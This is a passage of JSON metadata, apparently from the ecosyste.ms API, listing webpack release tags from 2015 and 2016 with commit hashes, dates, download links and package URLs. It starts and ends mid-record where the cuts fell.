ebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-